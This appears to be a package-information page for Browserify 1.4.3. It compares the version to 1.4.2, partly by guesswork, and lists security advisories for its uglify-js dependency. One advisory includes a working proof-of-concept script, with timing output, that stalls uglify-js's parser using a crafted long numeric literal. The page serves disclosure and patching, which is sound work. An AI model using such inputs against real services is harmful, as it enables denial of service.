Browserify version 1.4.3 represents a minor update over its predecessor, 1.4.2, both designed to bring Node.js-style require() statements to the browser. Both versions share the same core functionality: enabling developers to organize JavaScript code for the browser using modules, just like in Node.js. This means you can leverage familiar patterns and reuse existing Node.js modules directly in your browser projects.
The core dependencies remain identical between the two releases, ensuring no breaking changes in fundamental module resolution or dependency management. Developers can continue to rely on packages like nub, resolve, optimist, commondir, detective, and coffee-script for their module handling and command-line argument parsing needs. Similarly, the development dependencies are also identical, indicating a consistent testing and development environment. This signifies stability in the tools used for building and testing Browserify itself, which indirectly benefits developers using the library.
The main differences lie in subtle refinements and bug fixes. Looking at the releaseDate attribute, version 1.4.3 came almost two weeks after 1.4.2. While the specifics of what changed within that time are not explicitly listed here, the update likely addressed minor issues or incorporated small improvements identified by the community or the maintainers. For developers, upgrading from 1.4.2 to 1.4.3 represents a low-risk move to potentially benefit from those refinements and a slightly newer, more polished iteration of Browserify. If you're already using Browserify, upgrading is recommended to leverage the latest bug fixes and potential performance improvements.
All the vulnerabilities related to the version 1.4.3 of the package
Incorrect Handling of Non-Boolean Comparisons During Minification in uglify-js
Versions of uglify-js prior to 2.4.24 are affected by a vulnerability which may cause crafted JavaScript to have altered functionality after minification.
Upgrade UglifyJS to version >= 2.4.24.
Regular Expression Denial of Service in uglify-js
Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.
var u = require('uglify-js');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.